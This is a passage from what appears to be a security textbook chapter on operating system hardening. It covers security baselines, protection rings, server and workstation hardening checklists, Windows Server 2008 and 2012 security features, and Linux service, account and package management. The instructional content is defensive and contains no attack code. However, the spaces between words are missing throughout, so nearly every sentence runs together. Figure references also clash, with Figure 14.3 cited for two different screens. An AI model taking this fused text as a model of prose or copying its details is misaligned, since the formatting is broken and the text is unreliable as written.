andlogicalapproach.Thisstartswithanexaminationofthesystem’sintendedfunctionsandcapabilitiestodeterminewhatprocessesandapplicationswillbehousedonthesystem.Asabestpractice,anythingthatisnotrequiredforoperationsshouldberemovedordisabledonthesystem;then,alltheappropriatepatches,hotfixes,andsettingsshouldbeappliedtoprotectandsecureit.Thisprocessofestablishingasystem’ssecuritystateiscalled
baselining,andtheresultingproductisasecuritybaselinethatallowsthesystemtorunsafelyandsecurely.Oncetheprocesshasbeencompletedforaparticularhardwareandsoftwarecombination,anysimilarsystemscanbeconfiguredwiththesamebaselinetoachievethesamelevelanddepthofsecurityandprotection.Uniformbaselinesarecriticalinlarge-scaleoperations,becausemaintainingseparateconfigurationsandsecuritylevelsforhundredsorthousandsofsystemsisfartoocostly.Afteradministratorshavefinishedpatching,securing,andpreparinga
system,theyoftencreateaninitialbaselineconfiguration.Thisrepresentsasecurestateforthesystemornetworkdeviceandareferencepointthatcanbeusedtohelpkeepthesystemsecure.Ifthisinitialbaselinecanbereplicated,itcanalsobeusedasatemplatewhendeployingsimilarsystemsandnetworkdevices.Constructingabaselineorhardenedsystemissimilarforservers,
workstations,andnetworkOSs.Thespecificsmayvary,buttheobjectsarethesame.
OperatingSystemandNetworkOperatingSystemHardening
Theoperatingsystem(OS)ofacomputeristhebasicsoftwarethathandlesthingssuchasinput,output,display,memorymanagement,andalltheotherhighlydetailedtasksrequiredtosupporttheuserenvironmentandassociatedapplications.MostusersarefamiliarwiththeMicrosoftfamilyofdesktopoperatingsystems:WindowsVista,Windows7,
Windows8,andWindows10.Indeed,thevastmajorityofhomeandbusinessPCsrunsomeversionofaMicrosoftoperatingsystem.OtherusersmaybefamiliarwithMacOSX,Solaris,oroneofthemanyvarietiesoftheUNIX/Linuxoperatingsystem.Anetworkoperatingsystem(NOS)isanoperatingsystemthat
includesadditionalfunctionsandcapabilitiestoassistinconnectingcomputersanddevices,suchasprinters,toalocalareanetwork(LAN).SomeofthemorefamiliarnetworkoperatingsystemsincludeNovell’sNetWareandPCMicro’sLANtastic.Formostmodernoperatingsystems,includingWindows2008,Solaris,andLinux,thetermsoperatingsystemandnetworkoperatingsystemareusedinterchangeablyastheyperformallthebasicfunctionsandprovideenhancedcapabilitiesforconnectingtoLANs.
TechTip
TheTerm“OperatingSystem”Theterm“operatingsystem”isthecommonlyacceptednameforthesoftwarethatprovidestheinterfacebetweencomputerhardwareandtheuserandisresponsibleforthemanagement,coordination,andsharingoflimitedcomputerresourcessuchasmemoryanddiskspace.
OSSecurityTheoperatingsystemitselfisthefoundationofsystemsecurity.Theoperatingsystemdoesthisthroughtheuseofasecuritykernel.Thesecuritykernelisalsocalledareferencemonitorandisthecomponentoftheoperatingsystemthatenforcesthesecuritypoliciesoftheoperatingsystem.ThecoreoftheOSisconstructedsothatalloperationsmustpassthroughandbemoderatedbythesecuritykernel,placingitincompletecontrolovertheenforcementofrules.Securitykernelsmustexhibitsomepropertiestobereliedupon:theymustoffercompletemediation,asjustdiscussed,andmustbetamperproofandverifiableinoperation.Because
theyarepartoftheOSandareinfactapieceofsoftware,ensuringthatsecuritykernelsaretamperproofandverifiableisalegitimateconcern.ToachieveassurancewithrespecttotheseattributesisatechnicalmatterthatisrootedintheactualconstructionoftheOSandtechnicallybeyondthelevelofthisbook.
ProtectionRingsProtectionringsweredevisedintheMulticsoperatingsysteminthe1960s,todealwithsecurityissuesassociatedwithtime-sharingoperations.Protectionringscanbeenforcedbyhardware,software,oracombination,andservetoactasameansofmanagingprivilegeinahierarchicalmanner.Ring0isthelevelwiththehighestprivilegeandistheelementthatactsdirectlywiththephysicalhardware(CPUandmemory).Higherlevels,withlessprivilege,mustinteractthroughadjoiningringsthroughspecificgatesinapredefinedmanner.UseofringsseparateselementssuchasapplicationsfromdirectlyinterfacingwiththehardwarewithoutgoingthroughtheOSand,specifically,thesecuritykernel.
HostSecurityMostenvironmentsarefilledwithdifferentoperatingsystems(Windows,Linux,OSX),differentversionsofthoseoperatingsystems,anddifferenttypesofinstalledapplications.Also,today,host-basedsecurityformobiledeviceoperatingsystemsisanimportantsecurityissue,whichexpandstheoperatingsystemlisttoincludeiOS,Android,andBlackBerry.Each
operatingsystemhassecurityconfigurationsthatdifferfromothersystems,anddifferentversionsofthesameoperatingsystemmayinfacthavevariationsbetweenthem.Ensuringthateverycomputeris“lockeddown”tothesamedegreeaseveryothersystemintheenvironmentcanbeoverwhelmingandoftenresultsinanunsuccessfulandfrustratingeffort.Hostsecurityisimportantandshouldalwaysbeaddressed.Security,
however,shouldnotstopthere,ashostsecurityisacomplementaryprocesstobecombinedwithnetworksecurity.Ifindividualhostcomputershavevulnerabilitiesembodiedwithinthem,thennetworksecuritycanprovideanotherlayerofprotectionthatwill,hopefully,stopanyintruderswhohavegottenthatfarintotheenvironment.
MachineHardeningThekeymanagementissuebehindrunningasecureserversetupistoidentifythespecificneedsofaserverforitsproperoperationandenableonlyitemsnecessaryforthosefunctions.Keepingallotherservicesandusersoffthesystemimprovessystemthroughputandincreasessecurity.Reducingtheattacksurfaceareaassociatedwithaserverreducesthevulnerabilitiesnowandinthefutureasupdatesarerequired.Onceaserverhasbeenbuiltandisreadytobeplacedintooperation,the
recordingofhashvaluesonallofitscrucialfileswillprovidevaluableinformationlaterincaseofaquestionconcerningpossiblesystemintegrityafteradetectedintrusion.TheuseofhashvaluestodetectchangeswasfirstdevelopedbyGeneKimandEugeneSpaffordatPurdueUniversityin1992.TheconceptbecametheproductTripwire,whichisnowavailableincommercialandopensourceforms.Thesamebasicconceptisusedbymanysecuritypackagestodetectfile-levelchanges.Theprimarymethodofcontrollingthesecurityimpactofasystemona
networkistoreducetheavailableattacksurfacearea.Turningoffallservicesthatarenotneededorpermittedbypolicywillreducethenumberofvulnerabilities.Removingmethodsofconnectingadditionaldevicestoaworkstationtomovedata—suchasopticaldrivesandUSBports—assists
incontrollingthemovementofdataintoandoutofthedevice.User-levelcontrols,suchaslimitinge-mailattachmentoptions,screeningallattachmentsatthee-mailserverlevel,andreducingnetworksharestoneededsharesonly,canbeusedtolimittheexcessiveconnectivitythatcanimpactsecurity.
TechTip
ServerHardeningTipsSpecificsecurityneedscanvarydependingontheserver’sspecificuse,butasaminimum,thefollowingarebeneficial:
RemoveunnecessaryprotocolssuchasTelnet,NetBIOS,InternetworkPacketExchange(IPX),andFileTransferProtocol(FTP).
RemoveunnecessaryprogramssuchasInternetInformationServices(IIS).
Removeallsharesthatarenotnecessary.Renametheadministratoraccount,securingitwithastrongpassword.
RemovetheLocalAdminaccountinWindows.Disableunnecessaryuseraccounts.
Disableunnecessaryportsandservices.Keeptheoperatingsystem(OS)patchedanduptodate.
Keepallapplicationspatchedanduptodate.Turnoneventloggingfordeterminedsecurityelements.
Controlphysicalaccesstoservers.
OperatingSystemSecurityandSettingsOperatingsystemsarecomplexprogramsdesignedtoprovideaplatformforawidevarietyofservicestorun.SomeoftheseservicesareextensionsoftheOSitself,whileothersarestandaloneapplicationsthatusetheOSasamechanismtoconnecttootherprogramsandhardwareresources.ItisuptotheOStomanagethesecurityaspectsofthehardwarebeingutilized.
Thingssuchasaccesscontrolmechanismsaregreatintheory,butitisthepracticalimplementationofthesesecurityelementsintheOSthatprovidestheactualsecurityprofileofamachine.
TechTip
SecuringaWorkstationWorkstationsareattractivetargetsforcrackersbecausetheyarenumerousandcanserveasentrypointsintothenetworkandthedatathatiscommonlythetargetofanattack.Althoughsecurityisarelativeterm,followingthesebasicstepswillincreaseworkstationsecurityimmensely:
RemoveunnecessaryprotocolssuchasTelnet,NetBIOS,andIPX.Removeunnecessarysoftware.
Removemodemsunlessneededandauthorized.Removeallsharesthatarenotnecessary.
Renametheadministratoraccount,securingitwithastrongpassword.RemovetheLocalAdminaccountinWindows.
Disableunnecessaryuseraccounts.Disableunnecessaryportsandservices.
Installanantivirusprogramandkeepabreastofupdates.Ifthefloppydriveisnotneeded,removeordisconnectit.
ConsiderdisablingUSBportsviaCMOStorestrictdatamovementtoUSBdevices.IfnocorporatefirewallexistsbetweenthemachineandtheInternet,installafirewall.
Keeptheoperatingsystem(OS)patchedanduptodate.Keepallapplicationspatchedanduptodate.
Turnoneventloggingfordeterminedsecurityelements.
Earlyversionsofhomeoperatingsystemsdidnothaveseparatenamedaccountsforseparateusers.Thiswasseenasaconveniencemechanism;afterall,whowantsthehassleofsigningintothemachine?Thisledtothesimpleproblemthatalluserscouldthenseeandmodifyanddelete
everyoneelse’scontent.Contentcouldbeseparatedbyusingaccesscontrolmechanisms,butthatrequiredconfigurationoftheOStomanageeveryuser’sidentity.EarlyversionsofmanyOSscamewithliterallyeveryoptionturnedon.Again,thiswasaconveniencefactor,butitledtosystemsrunningprocessesandservicesthattheyneverused,andincreasingtheattacksurfaceofthehostunnecessarily.Determiningthecorrectsettingsandimplementingthemcorrectlyisan
importantstepinsecuringahostsystem.Thefollowingsectionsexplorethemultitudeofcontrolsandoptionsthatneedtobeemployedproperlytoachieveareasonablelevelofsecurityonahostsystem.
OSHardeningYoumustmeetseveralkeyrequirementstoensurethatthesystemhardeningprocessesdescribedinthissectionachievetheirsecuritygoals.TheseareOSindependentandshouldbeanormalpartofallsystemmaintenanceoperations:
ExamTip:Systemhardeningistheprocessofpreparingandsecuringasystemandinvolvestheremovalofallunnecessarysoftwareandservices.
ThebaseinstallationofallOSandapplicationsoftwarecomesfromatrustedsource,andisverifiedascorrectbyusinghashvalues.
Machinesareconnectedonlytoacompletelytrustednetworkduringtheinstallation,hardening,andupdateprocesses.
ThebaseinstallationincludesallcurrentservicepacksandupdatesforboththeOSandapplications.
Currentbackupimagesaretakenafterhardeningandupdatestofacilitatesystemrestorationtoaknownstate.
Thesestepsensurethatyouknowwhatisonthemachine,canverifyitsauthenticity,andhaveanestablishedbackupversion.
HardeningMicrosoftOperatingSystemsForthisbook,WindowsVista,Windows7and8,aswellasserverproductsWindowsServer2008,2008R2,and2012,arethefocusofthediscussion.OlderMicrosoftOSs,suchasWindows3.11,95,98,Me,andXP,arenolongersupportedbyMicrosoftandwon’tbecoveredinthischapter.
HardeningWindowsWiththereleaseofWindowsVista,MicrosofttriedtomakesimilarsecurityimprovementstoitsmainstreamdesktopOSasitdidtoitsmainserverOS,Windows2003.AsadesktopOS,Windowshasprovidedarangeofsecurityfeaturesforuserstosecuretheirsystems.Mostoftheseoptionscanbeemployedviagrouppoliciesinenterprisesetups,makingthemeasilydeployableandmaintainableacrossanenterprise.HerearesomeofthesecuritycapabilitiesintroducedwithVistaand
continuedinlaterversionsofWindows:
UserAccountControlallowsuserstooperatethesystemwithoutrequiringadministrativeprivileges.Ifyou’veusedWindowsVistaandbeyond,you’veundoubtedlyseenthe“Windowsneedsyourpermissiontocontinue”pop-ups.Whileannoyingtomanyusers(oneofApple’s“I’maMac”commercialsfocusedspecificallyonthisfeature),thisfeaturedoeshelppreventusersfrom“accidentally”makingchangestotheirsystemconfiguration.Figure14.1showstheUserAccountControlfeatureinWindows7.
•Figure14.1Windows7UserAccountControlinaction
WindowsFirewallincludesanoutboundfilteringcapability.Windowsallowsfilteringoftrafficcomingintoandleavingthesystem,whichisusefulforcontrollingthingslikepeer-to-peerapplications.
BitLockerallowsencryptionofalldataonaserver,includinganydatavolumes.Thiscapabilityisonlyavailableinthehigher-enddistributionsofWindows.
WindowsclientsworkwithNetworkAccessProtection.SeethediscussionofNAPinthefollowing“HardeningWindowsServer2008”sectionformoredetails.
WindowsDefenderisabuilt-inmalwaredetectionandremovaltool.WindowsDefenderdetectsmanytypesofpotentiallysuspicioussoftwareandcanprompttheuserbeforeallowingapplicationstomakepotentiallymaliciouschanges.
TechTip
VulnerabilityScanningOnevaluablemethodforhelpingadministratorssecuretheirsystemsisvulnerabilityscanning.Vulnerabilityscanningistheprocessofexaminingyoursystemsandnetworkdevicesforholes,weaknesses,andissuesandfindingthembeforeapotentialattackerdoes.Specializedtoolscalledvulnerabilityscannersaredesignedtohelpadministratorsdiscoverandaddressvulnerabilities.Butthereismuchmoretovulnerabilityscanningthansimplyrunningtoolsandexaminingtheresults—administratorsmustbeabletoanalyzeanydiscoveredvulnerabilitiesanddeterminetheirseverityandhowtoaddressthosevulnerabilitiesifneeded,andifanybusinessprocesseswillbeaffectedbypotentialfixes.Vulnerabilityscanningcanalsohelpadministratorsidentifycommonmisconfigurationsinaccountsetup,patchlevels,applications,andoperatingsystems.Mostorganizationslookatvulnerabilityscanningasanongoingprocess,asitisnotenoughtoscansystemsonceandassumetheywillbesecurefromthatpointon.
HardeningWindowsServer2008MicrosofttoutedWindowsServer2008asits“mostsecureserver”todateuponitsrelease.BuildingonthechangesitmadetotheWindowsServer2003andVistaOSs,Microsoftattemptedtoaddmoredefense-in-depthprotectionstoWindowsServer2008.(MicrosofthasafreehardeningguidefortheWindowsServer2008OSfromitsDownloadCenter.)HerearesomeofthenewsecuritycapabilitiesthatwereintroducedinWindowsServer2008:
BitLockerallowsencryptionofalldataonaserver,includinganydatavolumes.ThiscapabilityisalsoavailableincertainversionsofVista(andbeyond).
Role-basedinstallationoffunctionsandcapabilitiesminimizestheserver’sfootprint.Forexample,ifaserverisgoingtobeawebserver,itdoesnotneedDNSorSMTPsoftware,andthusthosefeaturesarenolongerinstalledbydefault.
NetworkAccessProtection(NAP)controlsaccesstonetwork
resourcesbasedonaclientcomputer’sidentityandcompliancewithcorporategovernancepolicy.NAPallowsnetworkadministratorstodefinegranularlevelsofnetworkaccessbasedonclientidentity,groupmembership,andthedegreetowhichthatclientiscompliantwithcorporatepolicies.NAPcanalsoensurethatclientscomplywithcorporatepolicies.Suppose,forexample,thatasalesmanagerconnectsherlaptoptothecorporatenetwork.NAPcanbeusedtoexaminethelaptopandseeifitisfullypatchedandrunningacompany-approvedantivirusproductwithupdatedsignatures.Ifthelaptopdoesnotmeetthosestandards,networkaccessforthatlaptopcanberestricteduntilthelaptopisbroughtbackintocompliancewithcorporatestandards.
Read-onlydomaincontrollerscanbecreatedanddeployedinhigh-risklocations,buttheycan’tbemodifiedtoaddnewusers,changeaccesslevels,andsoon.Thisnewabilitytocreateanddeploy“read-only”domaincontrollerscanbeveryusefulinhigh-threatenvironments.
More-granularpasswordpoliciesallowfordifferentpasswordpoliciesonagrouporuserbasis.Thisallowsadministratorstoassigndifferentpasswordpoliciesandrequirementsforthesalesgroupandtheengineeringgroupifthatcapabilityisneeded.
WebsitesorwebapplicationscanbeadministeredwithinIIS7.Thisallowsadministratorsquickerandmoreconvenientadministrationcapabilities,suchastheabilitytoturnonoroffspecificmodulesthroughtheIISmanagementinterface.Forexample,removingCGIsupportfromawebapplicationisaquickandsimpleoperationinIIS7.
Figure14.2liststheinitialconfigurationtasksforWindows2008.
•Figure14.2Windows2008InitialConfigurationTasks
HardeningWindowsServer2012WiththereleaseofWindowsServer2012,Microsoftaddedsignificantenhancementstoitssecuritybaselineforitsserverline:
ReplacedthetraditionalROM-BIOSwithUnifiedExtensibleFirmwareInterface(UEFI).Microsoftisusingthesecurity-hardened2.3.1version,whichpreventsbootcodeupdateswithoutappropriatedigitalcertificatesandsignatures.
ExtendedthetrustworthyandverifiedbootprocesstotheentireWindowsOSbootcodewithafeatureknownasSecureBoot.UEFIandSecureBootsignificantlyreducetheriskofmaliciouscode,suchasrootkitsandbootviruses.
ImprovedBitLockerfunctionalitytoallowadministrator-lessreboots.
InstitutedEarlyLaunchAnti-Malware(ELAM)toensurethatonlyknown,digitallysignedantimalwareprogramscanloadrightafterSecureBootfinishes(itdoesnotrequireUEFIorSecureBoot).Thispermitslegitimateantimalwareprogramstogetintomemoryandstartdoingtheirjobbeforefakeantivirusprogramsorothermaliciouscodecanact.
FullyintegratedDNSSEC.
IntegratedDataClassificationwithRightsManagementService,sothatyoucancontrolwhichusersandgroupscanaccesswhichdocumentsbaseduponcontentormarkedclassification.
IncludedManagedServiceAccounts,introducedinServer2008R2,toallowforadvancedself-maintainingfeatureswithextremelylongpasswords,whichautomaticallyresetevery30days,allunderActiveDirectorycontrolintheenterprise.
Windows2012R2continuedthesecurityfeaturesetthrough
refinementsandimprovementsacrossmanyofthesecurityfeatures.ConsistentwithMicrosoft’sclaimthatWindowsServer2008wasitsmostsecureservertodateatthetimeofrelease,itssubsequenttrackrecordshowsthatthecompanyiscommittedtounrivaledsecurityinenterpriseserverproducts.ThetoolsavailableineachsubsequentreleaseoftheserverOSaredesignedtoincreasethedifficultyfactorforattackers,eliminatingknownmethodsofexploitation.Thechallengeisinadministratingthesecurityfunctions,althoughtheintegrationofmanyoftheseviaActiveDirectorymakesthismuchmoremanageablethaninthepast.
MicrosoftSecurityComplianceManagerMicrosoftprovidesatool,SecurityComplianceManager(SCM),toassistsystemandenterpriseadministratorswiththeconfigurationofsecurityoptionsacrossawiderangeofMicrosoftplatforms.SCMallowsadministratorstousegrouppolicyobjects(GPOs)todeploysecurityconfigurationsacrossInternetExplorer,thedesktopOSs,serverOSs,andcommonapplicationssuchasMicrosoftOffice.Figure14.3illustratessomeofthemenuoptionsavailableinSCM,currentlyversion3.0.
•Figure14.3MicrosoftSecurityComplianceManager
MicrosoftAttackSurfaceAnalyzerOneofthechallengesinamodernenterpriseisunderstandingtheimpactofsystemchangesfromtheinstallationorupgradeofanapplicationonasystem.Tohelpyouovercomethatchallenge,MicrosofthasreleasedtheAttackSurfaceAnalyzer(ASA),afreetoolthatcanbedeployedonasystembeforeachangeandagainafterachangetoanalyzethechangestovarioussystempropertiesasaresultofthechange.UsingASA,developerscanviewchangesintheattacksurfaceresulting
fromtheintroductionoftheircodeontotheWindowsplatform,andsystemadministratorscanassesstheaggregateattacksurfacechangebytheinstallationofanapplication.SecurityauditorscanusethetooltoevaluatetheriskofaparticularpieceofsoftwareinstalledontheWindowsplatform.AndifASAisdeployedinabaselinemodebeforeanincident,securityincidentresponderscanpotentiallyuseASAtogainabetterunderstandingofthestateofasystem’ssecurityduringaninvestigation.
HardeningUNIX-orLinux-basedOperatingSystemsWhileyoudonothavetheadvantageofasinglemanufacturerforallUNIXoperatingsystems(likeyoudowithWindowsoperatingsystems),theconceptsbehindsecuringdifferentUNIX-orLinux-basedoperatingsystemsaresimilarwhetherthemanufacturerisRedHatorSunMicrosystems.Indeed,theoveralltasksinvolvedwithhardeningalloperatingsystemsareremarkablysimilar.
EstablishingGeneralUNIXBaselinesGeneralUNIXbaseliningfollowssimilarconceptsasbaseliningforWindowsOSs:disableunnecessaryservices,restrictpermissionsonfiles
anddirectories,removeunnecessarysoftware,applypatches,removeunnecessaryusers,andapplypasswordguidelines.SomeversionsofUNIXprovideGUI-basedtoolsforthesetasks,whileothersrequireadministratorstoeditconfigurationfilesmanually.Inmostcases,anythingthatcanbeaccomplishedthroughaGUIcanbeaccomplishedfromthecommandlineorbymanuallyeditingconfigurationfiles.LikeWindowssystems,UNIXsystemsareeasiesttosecureand
baselineiftheyareprovidingasingleserviceorperformingasinglefunction,suchasactingasaSimpleMailTransferProtocol(SMTP)serverorwebserver.Priortoperforminganysoftwareinstallationsorbaselining,theadministratorshoulddefinethepurposeofthesystemandidentifyallrequiredcapabilitiesandfunctions.OneniceadvantageofUNIXsystemsisthatyoutypicallyhavecompletecontroloverwhatdoesordoesnotgetinstalledonthesystem.Duringtheinstallationprocess,theadministratorcanselectwhichservicesandapplicationsareplacedonthesystem,offeringanopportunitytonotinstallservicesandapplicationsthatwillnotberequired.However,thisassumesthattheadministratorknowsandunderstandsthepurposeofthissystem,whichisnotalwaysthecase.Inothercases,thefunctionofthesystemitselfmayhavechanged.
TechTip
RunlevelsRunlevelsareusedtodescribethestateofinit(initialization)andwhatsystemservicesareoperatinginUNIXsystems.Forexample,runlevel0isshutdown.Runlevel1issingle-usermode(typicallyforadministrativepurposes).Runlevels2through5areuserdefined(thatis,administratorscandefinewhatservicesarerunningateachlevel).Runlevel6isforreboot.
Regardlessoftheinstallationdecisions,theadministratormayneedtoremoveapplicationsorcomponentsthatarenolongerneeded.WithUNIXsystems,no“add/removeprogram”wizardisusuallyavailable,unlikeWindows,butyouwilloftenencounterpackagemanagersthathelpyouremoveunneededcomponentsandapplicationsautomatically.Onsome
UNIXversions,though,youmustmanuallydeletethefilesassociatedwiththeapplicationsorservicesyouwanttoremove.ServicesonaUNIXsystem(calleddaemons)canbecontrolledthrough
anumberofdifferentmechanisms.Astherootuser,anadministratorcanstartandstopservicesmanuallyfromthecommandlineorthroughaGUItool.TheOScanalsostopandstartservicesautomaticallythroughconfigurationfiles(usuallycontainedinthe/etcdirectory).(NotethatUNIXsystemsvaryagooddealinthisregard,assomeuseasuper-serverprocess,suchasinetd,whileothershaveindividualconfigurationfilesforeachnetworkservice.)UnlikeWindows,UNIXsystemscanalsohavedifferentrunlevels,inwhichthesystemcanbeconfiguredtobringupdifferentservicesdependingontherunlevelselected.OnarunningUNIXsystem,youcanseewhichprocesses,applications,
andservicesarerunningbyusingtheprocessstatus,orps,command,asshowninFigure14.3.Tostoparunningservice,anadministratorcanidentifytheservicebyitsuniqueprocessidentifier(PID)andthenusethekillcommandtostoptheservice.Forexample,ifyouwantedtostopthebluetooth-appletserviceinFigure14.4,youwouldusethecommandkill2443.Topreventthisservicefromstartingagainwhenthesystemisrebooted,youwouldhavetomodifytheappropriaterunlevelstoremovethisservice,asshowninFigure14.5,ormodifytheconfigurationfilesthatcontrolthisservice.
•Figure14.4pscommandrunonaFedorasystem
•Figure14.5ServiceConfigurationutilityfromaFedorasystem
AccountsonaUNIXsystemcanalsobecontrolledviaGUIsinsomecasesandcommand-lineinterfacesinothers.OnmostpopularUNIXversions,theuserinformationcanbefoundinthepasswdfilelocatedinthe/etcdirectory.Bymanuallyeditingthisfile,youcanadd,delete,ormodifyuseraccountsonthesystem.Byexaminingthisfile,anadministratorcanseewhichuseraccountsexistonthesystemandthen
determinewhichaccountstoremoveordisable.OnmostUNIXsystems,ifyouremovetheuseraccountfromthepasswdfile,youmustmanuallyremoveanyfilesthatbelongtothatuser,includinghomedirectories.MostmodernUNIXversionsstoretheactualpasswordassociatedwithauseraccountinashadowfilelocatedinthe/etcdirectory.Theshadowfilecontainstheactualpasswordhashesforeachuseraccountandisreadableonlybytherootuser(oraprocesswithroot-levelpermissions).HowyoupatchaUNIXsystemdependsagreatdealontheUNIX
versioninuseandthepatchbeingapplied.Insomecases,apatchwillconsistofaseriesofmanualstepsrequiringtheadministratortoreplacefiles,changepermissions,andalterdirectories.Inothercases,thepatchesareexecutablescriptsorutilitiesthatperformthepatchactionsautomatically.SomeUNIXversions,suchasRedHatandSolaris,havebuilt-inutilitiesthathandlethepatchingprocess.Inthosecases,theadministratordownloadsaspecificallyformattedfilethatthepatchingutilitythenprocessestoperformanymodificationsorupdatesthatneedtobemade.TobetterillustrateUNIXbaselines,wewillexaminetwopopular
UNIX-basedoperatingsystems:SolarisandRedHatLinux.
TechTip
TCPWrappersTCPwrapperscanbeagreatadditionallayerofprotectionforUNIXsystems.WhencreatingasecuritybaselineforUNIXsystems,besuretoconsidertheuseofTCPwrappers.
Anothermethodofexaminingasystemforvulnerabilitiesisdonethroughobservation—monitoringnetworktrafficfromspecificsystems,forexample.Thisiscalledpassivevulnerabilityscanningasadministratorsaremerelyobservingwhatthesystemdoesandhowitbehaves.Forinstance,ifanadministratorseesFTPtraffictravelingtoadedicatedmailserver,thentheyknowtheyneedtoexamineandpossiblydisablethatFTPservice.
PluggableAuthenticationModules(PAM)areamechanismforprovidinginteroperationandsecureaccesstoavarietyofservicesondifferentplatforms.Theyprovideacommonauthenticationschemethatcanbeusedwithawidevarietyofapplications.PAMhasanextensivedocumentationsetwithdetailsaboutbothusingPAMandwritingmodulestointegratePAMwithapplications.
HardeningLinuxLinuxisaratheruniqueoperatingsystem.ItisUNIX-based,verypowerful,opensource,canbeobtainedforfree,andisavailableinmanydifferent“versions”ordistributions(“distros”)fromseveralvendors.LinuxwasinitiallyconceivedandwrittenbyLinusTorvaldsin1991.Hisconceptofcreatingalightweight,flexible,andfreeoperatingsystemgaverisetoanentirelynewoperatingsystemthatisverypopularandisinstalledonmillionsofcomputersaroundtheworld.Duetoitsopennature,theentiresource-codebasefortheoperatingsystemisavailabletoanyonewhowantstoexamineit,modifyit,orrecompileitfortheirownspecificuses.Linuxisafavoredoperatingsystemamongmanysecurityprofessionals,systemadministrators,andotherhighlytechnicaluserswhoenjoytheflexibilityandpowerthatLinuxprovides.
ManyLinuxdistributionsare“opensource,”meaningifyouhavethetime,energy,andexpertise,youcanaccessandmodifythecodethatcomprisestheoperatingsystemitself.
WhilemostversionsofLinuxcanbeobtainedforfreesimplybydownloadingthemfromtheInternet(includingmajorcommercialdistributions),youcanalsopurchasecommercialversionsoftheLinuxoperatingsystemfromvendors,suchasRedHat,Slackware,SuSE,andDebian,whohavebuiltabusinessoutofprovidingcustomversionsofLinuxalongwithsupportandtraining.WewilluseFedora,apopular(and
free)Linuxdistribution,astheexamplefortherestofthissection.RegardlessofwhichLinuxversionyouprefer,baseliningaLinuxsystemfollowsthesameguidelinesasanyotherUNIXsystem:disableunnecessaryservices,restrictpermissionsonfilesanddirectories,removeunnecessarysoftware,applypatches,removeunnecessaryusers,andapplypasswordguidelines.ServicesunderLinuxarenormallycontrolledbytheirown
configurationfilesorbyxinetd,theextendedInternetservicesdaemon.InsteadofstartingallInternetservices,suchasFTPservers,atsystemstartup,someLinuxdistributionsusexinetdtolistenforincomingconnections.Xinetdlistenstoalltheappropriateports(thosethatmatchtheservicesinitsconfigurationfiles),andwhenaconnectionrequestcomesin,xinetdstartstheappropriateserverandhandsovertheconnectionrequest.This“masterprocess”approachmakesitfairlysimpletodisableunwantedservices—alltheconfigurationinformationforeachserverislocatedin/etc/xinetd.d,withaconfigurationfileforeachprocess.PermissionsunderLinuxarethesameasforotherUNIX-based
operatingsystems.Therearepermissionsforowner,group,andothers(orworld).Permissionsarebasedonthesameread-write-executeprincipleandcanbeadjustedusingthechmodcommand.Individualandgroupownershipinformationcanbechangedusingchownandchgrp,respectively.Aswithotherbaseliningexercises,permissionsshouldbeasrestrictiveasfunctionallypossible,givingread-onlyaccesswhenpossibleandwriteorexecuteaccesswhennecessary.
TechTip
LinuxVariantsTheoriginalLinuxcodeisopensource,andfromthiscodemanydiversevariantshavebeendeveloped.Whiletheseareallverysimilar,therearedifferenceinhowdevelopersapproachedsomeactivitiessuchaspatchingandsourcecoderepositories.ThedifferentdistrosofLinuxandmethodsofapplyingthemarerelatedtothelineageoftheLinuxdistroitself.FordistrosthatderivefromtheDebianline(Debian,Ubuntu,LinuxMint)thefileformat.debisused.FordistrosderivedfromRedhat(Redhat,RHEL,Fedora,CentOS,SUSE)
the.rpmfilestructureisused.Thetwoformats,.deband.rpm,arebasicallyarchivefileswithmetadatatoassist
installers.Thedifferencesarenoticeablewhenauserusestoolstoapplytheupdates.Theunderlyingtoolfor.debisdpkg,andrpmfor.rpm.Butthesearesimpletools,notrepositorymanagers;forrepositorymanagementandbetterfunctionality,apt-getisusedwith.debandyumisusedwithrpm.Althougheachoftheseoptionsisdifferentinusageandeachhasitschampions,attheendoftheday,bothpathsprovidethesameservicesforadministrators.Thekeytakeawayisalthoughsimilar,therearedifferencesinversionsofLinuxthatmakeadministrationlessuniversalinprocess.
AddingandremovingsoftwareunderLinuxistypicallydonethroughapackagemanager.InFedoraCoreLinux,thepackagemanageriscalledRedHatPackageManager,orrpmforshort.Usingrpm,youcanadd,modify,update,orremovesoftwarepackagesfromyoursystem.Usingtherpm–qacommandwillgiveyoualistofallthesoftwarepackagesinstalledonyourRedHatsystem.Youcanremoveanypackagesyoudonotwishtoleaveinstalledbyusingtherpm-ecommand.AswithmostthingsunderLinux,thereisaGUI-basedutilitytoaccomplishthissametask.TheGUI-basedAdd/RemoveSoftwareutilityisshowninFigure14.6.
•Figure14.6FedoraAdd/RemoveSoftwareutility
PatchingandkeepingaFedoraLinuxsystemuptodateisafairlysimpleexercise,aswell.FedorahasprovidedanUpdateAgentthat,onceconfigured,willexamineyoursystem,obtainthelistofavailableupdates,and,ifdesired,installthoseupdatesonyoursystem.Likeanyotheroperatingsystem,itisimportanttomaintainthepatchlevelofyourFedorasystem.FormoreinformationontheFedoraUpdateAgent,seethe“Updates(a.k.a.Hotfixes,ServicePacks,andPatches)”sectionlaterinthischapter.ManagingandmaintaininguseraccountsunderLinuxcanbe
accomplishedwitheitherthecommandlineoraGUI.Unlikecertainother
operatingsystems,there’sreallyonlyonedefaultaccountforLinuxsystems—theroot,orsuperuser,account.Therootaccounthascompleteandtotalcontroloverthesystemandshouldthereforebeprotectedwithanexceptionallystrongpassword.Manyadministratorswillconfiguretheirsystemstopreventanyonefromloggingindirectlyasroot;insteadtheymustloginwiththeirownpersonalaccountsandswitchtotherootaccountusingthesucommand.Addinguseraccountscanbedonewiththeuseraddcommand,andunwanteduseraccountscanberemovedusingtheuserdelcommand.Additionallyyoucanmanuallyedit/etc/passwdtoaddorremoveuseraccounts.UseraccountscanalsobemanagedviaaGUI,asshowninFigure14.7.
•Figure14.7FedoraUserManager
Forincreasedlocalsecurity,Fedoraalsoprovidesabuilt-infirewallfunctionthatcanbemanagedeitherviathecommandlineorthroughaGUI,asshowninFigure14.8.Toprotectnetworkaccesstothelocalsystem,administratorscancontrolwhichportsexternalusersmayconnectto,suchasmail,FTP,orweb.Administratorsmaychooseasecuritylevel,fromhigh,medium,off,oracustomizedoptionthatenablesthemtoindividuallyselectwhichportsonwhichinterfacesexternalusersmayconnectto.
•Figure14.8FedoraFirewallConfigurationGUI
Inadditiontothebuilt-infirewallfunctions,administratorsmayalsouseTCPwrapperslikethosediscussedearlierinthischapter.Byspecifying
